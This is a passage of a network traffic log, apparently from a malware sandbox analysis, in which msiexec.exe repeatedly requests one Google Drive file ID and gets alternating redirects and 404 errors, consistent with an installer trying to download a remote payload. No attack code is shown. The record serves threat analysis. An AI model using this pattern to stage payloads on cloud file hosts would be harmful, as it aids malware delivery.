                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          23 | 192.168.2.6 | 50006 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:25 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:26 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC7LwDHnN5wztW_AYHq2cI0sMnGuhudbvj94l9-uvVET84P0ZXMr3aRMV_oVxRcBdBept_iqLeQ
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:26 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-gSUTuIqCXvSlkYLUqLgx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:26 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-uS1JN2Er78ST6P6To0PHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          24 | 192.168.2.6 | 50007 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:26 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:27 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZY_8WUVeNh0_7iT1h5-kOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          25 | 192.168.2.6 | 50008 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:28 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:28 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTPHlsYCxQBD3XByofZQWkU5v1TPsazJ89RGxp252ILNsba_MXvZblxohrhj1l3Koxh
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:28 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-0to7DuxX24XE9i3F2cPFMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8XiRAdIrV2QzjO8mF6FGYg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          26 | 192.168.2.6 | 50009 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:29 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:29 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-YIX9psvreekzAcwhrDtEwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          27 | 192.168.2.6 | 50010 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:30 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:30 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTCXI2RpCHyS7wW4CS3AQvmV2M-wFk1LE_rCJqmrG31kI_KotDqxZzNnlFv87il8FKV7IwmxeM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:30 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-4c5VbNs3s2yayQ42twrFaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GeyiYZHLEojfgsrY5Jal_Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          28 | 192.168.2.6 | 50012 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:31 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:31 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-5Rm0un58Fn2oBa5NgQsQAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          29 | 192.168.2.6 | 50013 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:32 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTDd2LXSrTX-FsSt6rvNAsoI1OmBad156y6ASntf6p5_kjNxsz_uEONOyxruF1Do7WQ
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:33 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-cpcDJH9Oq3Uh8pgUAN6yJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_zkct8yZohdmK8QFX4B74g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          30 | 192.168.2.6 | 50015 | 142.250.185.110 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:34 UTC | 418 | OUT | GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:34 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-d0Uux2l-Iw6EMU928_Lgsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          31 | 192.168.2.6 | 50016 | 216.58.206.65 | 443 | 5692 | C:\Windows\SysWOW64\msiexec.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          2025-01-10 14:17:35 UTC | 460 | OUT | GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
